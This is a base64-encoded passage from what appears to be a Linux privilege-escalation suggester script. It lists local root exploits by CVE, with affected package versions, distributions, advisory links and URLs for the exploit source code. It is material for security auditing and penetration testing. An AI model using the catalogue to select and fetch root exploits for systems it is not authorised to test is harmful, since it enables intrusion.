EtMjkyMV0ke3R4dHJzdH0ga3RzdXNzClJlcXM6IHBrZz1rdHN1c3MsdmVyPD0xLjQKVGFnczogc3Bhcmt5PTV8NgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDExLzA4LzEzLzIKc3JjLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Jjb2xlcy9sb2NhbC1leHBsb2l0cy9tYXN0ZXIvQ1ZFLTIwMTEtMjkyMS9rdHN1c3MtbHBlLnNoCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDEyLTA4MDldJHt0eHRyc3R9IGRlYXRoX3N0YXIgKHN1ZG8pClJlcXM6IHBrZz1zdWRvLHZlcj49MS44LjAsdmVyPD0xLjguMwpUYWdzOiBmZWRvcmE9MTYgClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vc2VjbGlzdHMub3JnL2Z1bGxkaXNjbG9zdXJlLzIwMTIvSmFuL2F0dC01OTAvYWR2aXNvcnlfc3Vkby50eHQKZXhwbG9pdC1kYjogMTg0MzYKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTQtMDQ3Nl0ke3R4dHJzdH0gY2hrcm9vdGtpdApSZXFzOiBwa2c9Y2hrcm9vdGtpdCx2ZXI8MC41MApUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9zZWNsaXN0cy5vcmcvb3NzLXNlYy8yMDE0L3EyLzQzMApleHBsb2l0LWRiOiAzMzg5OQpDb21tZW50czogUm9vdGluZyBkZXBlbmRzIG9uIHRoZSBjcm9udGFiICh1cCB0byBvbmUgZGF5IG9mIGRlbGF5KQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNC01MTE5XSR7dHh0cnN0fSBfX2djb252X3RyYW5zbGl0X2ZpbmQKUmVxczogcGtnPWdsaWJjfGxpYmM2LHg4NgpUYWdzOiBkZWJpYW49NgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL2dvb2dsZXByb2plY3R6ZXJvLmJsb2dzcG90LmNvbS8yMDE0LzA4L3RoZS1wb2lzb25lZC1udWwtYnl0ZS0yMDE0LWVkaXRpb24uaHRtbApzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vb2ZmZW5zaXZlLXNlY3VyaXR5L2V4cGxvaXQtZGF0YWJhc2UtYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy8zNDQyMS50YXIuZ3oKZXhwbG9pdC1kYjogMzQ0MjEKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTUtMTg2Ml0ke3R4dHJzdH0gbmV3cGlkIChhYnJ0KQpSZXFzOiBwa2c9YWJydCxjbWQ6Z3JlcCAtcWkgYWJydCAvcHJvYy9zeXMva2VybmVsL2NvcmVfcGF0dGVybgpUYWdzOiBmZWRvcmE9MjAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTUvMDQvMTQvNApzcmMtdXJsOiBodHRwczovL2dpc3QuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Rhdmlzby8wZjAyYzI1NWMxM2M1YzExMzQwNi9yYXcvZWFmYWM3OGRjZTUxMzI5YjAzYmVhNzE2N2YxMjcxNzE4YmVlNGRjYy9uZXdwaWQuYwpleHBsb2l0LWRiOiAzNjc0NgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0zMzE1XSR7dHh0cnN0fSByYWNlYWJydApSZXFzOiBwa2c9YWJydCxjbWQ6Z3JlcCAtcWkgYWJydCAvcHJvYy9zeXMva2VybmVsL2NvcmVfcGF0dGVybgpUYWdzOiBmZWRvcmE9MTl7YWJydDoyLjEuNS0xLmZjMTl9LGZlZG9yYT0yMHthYnJ0OjIuMi4yLTIuZmMyMH0sZmVkb3JhPTIxe2FicnQ6Mi4zLjAtMy5mYzIxfSxSSEVMPTd7YWJydDoyLjEuMTEtMTIuZWw3fQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3NlY2xpc3RzLm9yZy9vc3Mtc2VjLzIwMTUvcTIvMTMwCnNyYy11cmw6IGh0dHBzOi8vZ2lzdC5naXRodWJ1c2VyY29udGVudC5jb20vdGF2aXNvL2ZlMzU5MDA2ODM2ZDZjZDEwOTFlL3Jhdy8zMmZlODQ4MWM0MzRmOGNhZDViY2Y4NTI5Nzg5MjMxNjI3ZTUwNzRjL3JhY2VhYnJ0LmMKZXhwbG9pdC1kYjogMzY3NDcKYXV0aG9yOiBUYXZpcyBPcm1hbmR5CkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE1LTEzMThdJHt0eHRyc3R9IG5ld3BpZCAoYXBwb3J0KQpSZXFzOiBwa2c9YXBwb3J0LHZlcj49Mi4xMyx2ZXI8PTIuMTcsY21kOmdyZXAgLXFpIGFwcG9ydCAvcHJvYy9zeXMva2VybmVsL2NvcmVfcGF0dGVybgpUYWdzOiB1YnVudHU9MTQuMDQKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTUvMDQvMTQvNApzcmMtdXJsOiBodHRwczovL2dpc3QuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Rhdmlzby8wZjAyYzI1NWMxM2M1YzExMzQwNi9yYXcvZWFmYWM3OGRjZTUxMzI5YjAzYmVhNzE2N2YxMjcxNzE4YmVlNGRjYy9uZXdwaWQuYwpleHBsb2l0LWRiOiAzNjc0NgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0xMzE4XSR7dHh0cnN0fSBuZXdwaWQgKGFwcG9ydCkgMgpSZXFzOiBwa2c9YXBwb3J0LHZlcj49Mi4xMyx2ZXI8PTIuMTcsY21kOmdyZXAgLXFpIGFwcG9ydCAvcHJvYy9zeXMva2VybmVsL2NvcmVfcGF0dGVybgpUYWdzOiB1YnVudHU9MTQuMDQuMgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL29wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxNS8wNC8xNC80CmV4cGxvaXQtZGI6IDM2NzgyCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE1LTMyMDJdJHt0eHRyc3R9IGZ1c2UgKGZ1c2VybW91bnQpClJlcXM6IHBrZz1mdXNlLHZlcjwyLjkuMwpUYWdzOiBkZWJpYW49Ny4wfDguMCx1YnVudHU9KgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3NlY2xpc3RzLm9yZy9vc3Mtc2VjLzIwMTUvcTIvNTIwCmV4cGxvaXQtZGI6IDM3MDg5CkNvbW1lbnRzOiBOZWVkcyBjcm9uIG9yIHN5c3RlbSBhZG1pbiBpbnRlcmFjdGlvbgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0xODE1XSR7dHh0cnN0fSBzZXRyb3VibGVzaG9vdApSZXFzOiBwa2c9c2V0cm91Ymxlc2hvb3QsdmVyPDMuMi4yMgpUYWdzOiBmZWRvcmE9MjEKUmFuazogMQpleHBsb2l0LWRiOiAzNjU2NApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0zMjQ2XSR7dHh0cnN0fSB1c2VyaGVscGVyClJlcXM6IHBrZz1saWJ1c2VyLHZlcjw9MC42MApUYWdzOiBSSEVMPTZ7bGlidXNlcjowLjU2LjEzLSg0fDUpLmVsNn0sUkhFTD02e2xpYnVzZXI6MC42MC01LmVsN30sZmVkb3JhPTEzfDE5fDIwfDIxfDIyClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMTUvMDcvMjMvY3ZlLTIwMTUtMzI0NS1jdmUtMjAxNS0zMjQ2L2N2ZS0yMDE1LTMyNDUtY3ZlLTIwMTUtMzI0Ni50eHQgCmV4cGxvaXQtZGI6IDM3NzA2CkNvbW1lbnRzOiBSSEVMIDUgaXMgYWxzbyB2dWxuZXJhYmxlLCBidXQgaW5zdGFsbGVkIHZlcnNpb24gb2YgZ2xpYmMgKDIuNSkgbGFja3MgZnVuY3Rpb25zIG5lZWRlZCBieSByb290aGVscGVyLmMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTUtNTI4N10ke3R4dHJzdH0gYWJydC9zb3NyZXBvcnQtcmhlbDcKUmVxczogcGtnPWFicnQsY21kOmdyZXAgLXFpIGFicnQgL3Byb2Mvc3lzL2tlcm5lbC9jb3JlX3BhdHRlcm4KVGFnczogUkhFTD03e2FicnQ6Mi4xLjExLTEyLmVsN30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3Lm9wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxNS8xMi8wMS8xCnNyYy11cmw6IGh0dHBzOi8vd3d3Lm9wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxNS8xMi8wMS8xLzEKZXhwbG9pdC1kYjogMzg4MzIKYXV0aG9yOiByZWJlbApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS02NTY1XSR7dHh0cnN0fSBub3RfYW5fc3NobnVrZQpSZXFzOiBwa2c9b3BlbnNzaC1zZXJ2ZXIsdmVyPj02LjgsdmVyPD02LjkKVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDE3LzAxLzI2LzIKZXhwbG9pdC1kYjogNDExNzMKYXV0aG9yOiBGZWRlcmljbyBCZW50bwpDb21tZW50czogTmVlZHMgYWRtaW4gaW50ZXJhY3Rpb24gKHJvb3QgdXNlciBuZWVkcyB0byBsb2dpbiB2aWEgc3NoIHRvIHRyaWdnZXIgZXhwbG9pdGF0aW9uKQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS04NjEyXSR7dHh0cnN0fSBibHVlbWFuIHNldF9kaGNwX2hhbmRsZXIgZC1idXMgcHJpdmVzYwpSZXFzOiBwa2c9Ymx1ZW1hbix2ZXI8Mi4wLjMKVGFnczogZGViaWFuPTh7Ymx1ZW1hbjoxLjIzfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly90d2l0dGVyLmNvbS90aGVncnVncS9zdGF0dXMvNjc3ODA5NTI3ODgyODEzNDQwCmV4cGxvaXQtZGI6IDQ2MTg2CmF1dGhvcjogU2ViYXN0aWFuIEtyYWhtZXIKQ29tbWVudHM6IERpc3Ryb3MgdXNlIG93biB2ZXJzaW9uaW5nIHNjaGVtZS4gTWFudWFsIHZlcmlmaWNhdGlvbiBuZWVkZWQuCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTEyNDBdJHt0eHRyc3R9IHRvbWNhdC1yb290cHJpdmVzYy1kZWIuc2gKUmVxczogcGtnPXRvbWNhdApUYWdzOiBkZWJpYW49OCx1YnVudHU9MTYuMDQKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vbGVnYWxoYWNrZXJzLmNvbS9hZHZpc29yaWVzL1RvbWNhdC1EZWJQa2dzLVJvb3QtUHJpdmlsZWdlLUVzY2FsYXRpb24tRXhwbG9pdC1DVkUtMjAxNi0xMjQwLmh0bWwKc3JjLXVybDogaHR0cDovL2xlZ2FsaGFja2Vycy5jb20vZXhwbG9pdHMvdG9tY2F0LXJvb3Rwcml2ZXNjLWRlYi5zaApleHBsb2l0LWRiOiA0MDQ1MAphdXRob3I6IERhd2lkIEdvbHVuc2tpCkNvbW1lbnRzOiBBZmZlY3RzIG9ubHkgRGViaWFuLWJhc2VkIGRpc3Ryb3MKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtMTI0N10ke3R4dHJzdH0gbmdpbnhlZC1yb290LnNoClJlcXM6IHBrZz1uZ2lueHxuZ2lueC1mdWxsLHZlcjwxLjEwLjMKVGFnczogZGViaWFuPTgsdWJ1bnR1PTE0LjA0fDE2LjA0fDE2LjEwClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2xlZ2FsaGFja2Vycy5jb20vYWR2aXNvcmllcy9OZ2lueC1FeHBsb2l0LURlYi1Sb290LVByaXZFc2MtQ1ZFLTIwMTYtMTI0Ny5odG1sCnNyYy11cmw6IGh0dHBzOi8vbGVnYWxoYWNrZXJzLmNvbS9leHBsb2l0cy9DVkUtMjAxNi0xMjQ3L25naW54ZWQtcm9vdC5zaApleHBsb2l0LWRiOiA0MDc2OAphdXRob3I6IERhd2lkIEdvbHVuc2tpCkNvbW1lbnRzOiBSb290aW5nIGRlcGVuZHMgb24gY3Jvbi5kYWlseSAodXAgdG8gMjRoIG9mIGRlbGF5KS4gQWZmZWN0ZWQ6IGRlYjg6IDwxLjYuMjsgMTQuMDQ6IDwxLjQuNjsgMTYuMDQ6IDEuMTAuMDsgZ2VudG9vOiA8MS4xMC4yLXIzCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTE1MzFdJHt0eHRyc3R9IHBlcmxfc3RhcnR1cCAoZXhpbSkKUmVxczogcGtnPWV4aW0sdmVyPDQuODYuMgpUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cuZXhpbS5vcmcvc3RhdGljL2RvYy9DVkUtMjAxNi0xNTMxLnR4dApleHBsb2l0LWRiOiAzOTU0OQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi0xNTMxXSR7dHh0cnN0fSBwZXJsX3N0YXJ0dXAgKGV4aW0pIDIKUmVxczogcGtnPWV4aW0sdmVyPDQuODYuMgpUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cuZXhpbS5vcmcvc3RhdGljL2RvYy9DVkUtMjAxNi0xNTMxLnR4dApleHBsb2l0LWRiOiAzOTUzNQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi00OTg5XSR7dHh0cnN0fSBzZXRyb3VibGVzaG9vdCAyClJlcXM6IHBrZz1zZXRyb3VibGVzaG9vdApUYWdzOiBSSEVMPTZ8NwpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9jLXNraWxscy5ibG9nc3BvdC5jb20vMjAxNi8wNi9sZXRzLWZlZWQtYXR0YWNrZXItaW5wdXQtdG8tc2gtYy10by1zZWUuaHRtbApzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vc3RlYWx0aC90cm91Ymxlc2hvb3Rlci9yYXcvbWFzdGVyL3N0cmFpZ2h0LXNob290ZXIuYwpleHBsb2l0LWRiOgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi01NDI1XSR7dHh0cnN0fSB0b21jYXQtUkgtcm9vdC5zaApSZXFzOiBwa2c9dG9tY2F0ClRhZ3M6IFJIRUw9NwpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL2xlZ2FsaGFja2Vycy5jb20vYWR2aXNvcmllcy9Ub21jYXQtUmVkSGF0LVBrZ3MtUm9vdC1Qcml2RXNjLUV4cGxvaXQtQ1ZFLTIwMTYtNTQyNS5odG1sCnNyYy11cmw6IGh0dHA6Ly9sZWdhbGhhY2tlcnMuY29tL2V4cGxvaXRzL3RvbWNhdC1SSC1yb290LnNoCmV4cGxvaXQtZGI6IDQwNDg4CmF1dGhvcjogRGF3aWQgR29sdW5za2kKQ29tbWVudHM6IEFmZmVjdHMgb25seSBSZWRIYXQtYmFzZWQgZGlzdHJvcwpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi02NjYzLENWRS0yMDE2LTY2NjR8Q1ZFLTIwMTYtNjY2Ml0ke3R4dHJzdH0gbXlzcWwtZXhwbG9pdC1jaGFpbgpSZXFzOiBwa2c9bXlzcWwtc2VydmVyfG1hcmlhZGItc2VydmVyLHZlcjw1LjUuNTIKVGFnczogdWJ1bnR1PTE2LjA0LjEKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vbGVnYWxoYWNrZXJzLmNvbS9hZHZpc29yaWVzL015U1FMLU1hcmlhLVBlcmNvbmEtUHJpdkVzY1JhY2UtQ1ZFLTIwMTYtNjY2My01NjE2LUV4cGxvaXQuaHRtbApzcmMtdXJsOiBodHRwOi8vbGVnYWxoYWNrZXJzLmNvbS9leHBsb2l0cy9DVkUtMjAxNi02NjYzL215c3FsLXByaXZlc2MtcmFjZS5jCmV4cGxvaXQtZGI6IDQwNjc4CmF1dGhvcjogRGF3aWQgR29sdW5za2kKQ29tbWVudHM6IEFsc28gTWFyaWFEQiB2ZXI8MTAuMS4xOCBhbmQgdmVyPDEwLjAuMjggYWZmZWN0ZWQKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtOTU2Nl0ke3R4dHJzdH0gbmFnaW9zLXJvb3QtcHJpdmVzYwpSZXFzOiBwa2c9bmFnaW9zLHZlcjw0LjIuNApUYWdzOgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9sZWdhbGhhY2tlcnMuY29tL2Fkdmlzb3JpZXMvTmFnaW9zLUV4cGxvaXQtUm9vdC1Qcml2RXNjLUNWRS0yMDE2LTk1NjYuaHRtbApzcmMtdXJsOiBodHRwczovL2xlZ2FsaGFja2Vycy5jb20vZXhwbG9pdHMvQ1ZFLTIwMTYtOTU2Ni9uYWdpb3Mtcm9vdC1wcml2ZXNjLnNoCmV4cGxvaXQtZGI6IDQwOTIxCmF1dGhvcjogRGF3aWQgR29sdW5za2kKQ29tbWVudHM6IEFsbG93cyBwcml2IGVzY2FsYXRpb24gZnJvbSBuYWdpb3MgdXNlciBvciBuYWdpb3MgZ3JvdXAKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMDM1OF0ke3R4dHJzdH0gbnRmcy0zZy1tb2Rwcm9iZQpSZXFzOiBwa2c9bnRmcy0zZyx2ZXI8MjAxNy40ClRhZ3M6IHVidW50dT0xNi4wNHtudGZzLTNnOjIwMTUuMy4xNEFSLjEtMWJ1aWxkMX0sZGViaWFuPTcuMHtudGZzLTNnOjIwMTIuMS4xNUFSLjUtMi4xK2RlYjd1Mn0sZGViaWFuPTguMHtudGZzLTNnOjIwMTQuMi4xNUFSLjItMStkZWI4dTJ9ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2J1Z3MuY2hyb21pdW0ub3JnL3AvcHJvamVjdC16ZXJvL2lzc3Vlcy9kZXRhaWw/aWQ9MTA3MgpzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vb2ZmZW5zaXZlLXNlY3VyaXR5L2V4cGxvaXQtZGF0YWJhc2UtYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy80MTM1Ni56aXAKZXhwbG9pdC1kYjogNDEzNTYKYXV0aG9yOiBKYW5uIEhvcm4KQ29tbWVudHM6IERpc3Ryb3MgdXNlIG93biB2ZXJzaW9uaW5nIHNjaGVtZS4gTWFudWFsIHZlcmlmaWNhdGlvbiBuZWVkZWQuIExpbnV4IGhlYWRlcnMgbXVzdCBiZSBpbnN0YWxsZWQuIFN5c3RlbSBtdXN0IGhhdmUgYXQgbGVhc3QgdHdvIENQVSBjb3Jlcy4KRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctNTg5OV0ke3R4dHJzdH0gcy1uYWlsLXByaXZnZXQKUmVxczogcGtnPXMtbmFpbCx2ZXI8MTQuOC4xNgpUYWdzOiB1YnVudHU9MTYuMDQsbWFuamFybz0xNi4xMApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDE3LzAxLzI3LzcKc3JjLXVybDogaHR0cHM6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDE3LzAxLzI3LzcvMQpleHQtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vYmNvbGVzL2xvY2FsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNy01ODk5L2V4cGxvaXQuc2gKYXV0aG9yOiB3YXBpZmxhcGkgKG9yZ2luYWwgZXhwbG9pdCBhdXRob3IpOyBCcmVuZGFuIENvbGVzIChhdXRob3Igb2YgZXhwbG9pdCB1cGRhdGUgYXQgJ2V4dC11cmwnKQpDb21tZW50czogRGlzdHJvcyB1c2Ugb3duIHZlcnNpb25pbmcgc2NoZW1lLiBNYW51YWwgdmVyaWZpY2F0aW9uIG5lZWRlZC4KRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDM2N10ke3R4dHJzdH0gU3Vkb2VyLXRvLXJvb3QKUmVxczogcGtnPXN1ZG8sdmVyPD0xLjguMjAsY21kOlsgLWYgL3Vzci9zYmluL2dldGVuZm9yY2UgXQpUYWdzOiBSSEVMPTd7c3VkbzoxLjguNnA3fQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cuc3Vkby53cy9hbGVydHMvbGludXhfdHR5Lmh0bWwKc3JjLXVybDogaHR0cHM6Ly93d3cucXVhbHlzLmNvbS8yMDE3LzA1LzMwL2N2ZS0yMDE3LTEwMDAzNjcvbGludXhfc3Vkb19jdmUtMjAxNy0xMDAwMzY3LmMKZXhwbG9pdC1kYjogNDIxODMKYXV0aG9yOiBRdWFseXMKQ29tbWVudHM6IE5lZWRzIHRvIGJlIHN1ZG9lci4gV29ya3Mgb25seSBvbiBTRUxpbnV4IGVuYWJsZWQgc3lzdGVtcwpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNy0xMDAwMzY3XSR7dHh0cnN0fSBzdWRvcHduClJlcXM6IHBrZz1zdWRvLHZlcjw9MS44LjIwLGNtZDpbIC1mIC91c3Ivc2Jpbi9nZXRlbmZvcmNlIF0KVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnN1ZG8ud3MvYWxlcnRzL2xpbnV4X3R0eS5odG1sCnNyYy11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9jMGQzejNyMC9zdWRvLUNWRS0yMDE3LTEwMDAzNjcvbWFzdGVyL3N1ZG9wd24uYwpleHBsb2l0LWRiOgphdXRob3I6IGMwZDN6M3IwCkNvbW1lbnRzOiBOZWVkcyB0byBiZSBzdWRvZXIuIFdvcmtzIG9ubHkgb24gU0VMaW51eCBlbmFibGVkIHN5c3RlbXMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDM2NixDVkUtMjAxNy0xMDAwMzcwXSR7dHh0cnN0fSBsaW51eF9sZHNvX2h3Y2FwClJlcXM6IHBrZz1nbGliY3xsaWJjNix2ZXI8PTIuMjUseDg2ClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMTcvMDYvMTkvc3RhY2stY2xhc2gvc3RhY2stY2xhc2gudHh0CnNyYy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wNi8xOS9zdGFjay1jbGFzaC9saW51eF9sZHNvX2h3Y2FwLmMKZXhwbG9pdC1kYjogNDIyNzQKYXV0aG9yOiBRdWFseXMKQ29tbWVudHM6IFVzZXMgIlN0YWNrIENsYXNoIiB0ZWNobmlxdWUsIHdvcmtzIGFnYWluc3QgbW9zdCBTVUlELXJvb3QgYmluYXJpZXMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDM2NixDVkUtMjAxNy0xMDAwMzcxXSR7dHh0cnN0fSBsaW51eF9sZHNvX2R5bmFtaWMKUmVxczogcGtnPWdsaWJjfGxpYmM2LHZlcjw9Mi4yNSx4ODYKVGFnczogZGViaWFuPTl8MTAsdWJ1bnR1PTE0LjA0LjV8MTYuMDQuMnwxNy4wNCxmZWRvcmE9MjN8MjR8MjUKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wNi8xOS9zdGFjay1jbGFzaC9zdGFjay1jbGFzaC50eHQKc3JjLXVybDogaHR0cHM6Ly93d3cucXVhbHlzLmNvbS8yMDE3LzA2LzE5L3N0YWNrLWNsYXNoL2xpbnV4X2xkc29fZHluYW1pYy5jCmV4cGxvaXQtZGI6IDQyMjc2CmF1dGhvcjogUXVhbHlzCkNvbW1lbnRzOiBVc2VzICJTdGFjayBDbGFzaCIgdGVjaG5pcXVlLCB3b3JrcyBhZ2FpbnN0IG1vc3QgU1VJRC1yb290IFBJRXMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDM2NixDVkUtMjAxNy0xMDAwMzc5XSR7dHh0cnN0fSBsaW51eF9sZHNvX2h3Y2FwXzY0ClJlcXM6IHBrZz1nbGliY3xsaWJjNix2ZXI8PTIuMjUseDg2XzY0ClRhZ3M6IGRlYmlhbj03Ljd8OC41fDkuMCx1YnVudHU9MTQuMDQuMnwxNi4wNC4yfDE3LjA0LGZlZG9yYT0yMnwyNSxjZW50b3M9Ny4zLjE2MTEKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wNi8xOS9zdGFjay1jbGFzaC9zdGFjay1jbGFzaC50eHQKc3JjLXVybDogaHR0cHM6Ly93d3cucXVhbHlzLmNvbS8yMDE3LzA2LzE5L3N0YWNrLWNsYXNoL2xpbnV4X2xkc29faHdjYXBfNjQuYwpleHBsb2l0LWRiOiA0MjI3NQphdXRob3I6IFF1YWx5cwpDb21tZW50czogVXNlcyAiU3RhY2sgQ2xhc2giIHRlY2huaXF1ZSwgd29ya3MgYWdhaW5zdCBtb3N0IFNVSUQtcm9vdCBiaW5hcmllcwpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNy0xMDAwMzcwLENWRS0yMDE3LTEwMDAzNzFdJHt0eHRyc3R9IGxpbnV4X29mZnNldDJsaWIKUmVxczogcGtnPWdsaWJjfGxpYmM2LHZlcjw9Mi4yNSx4ODYKVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi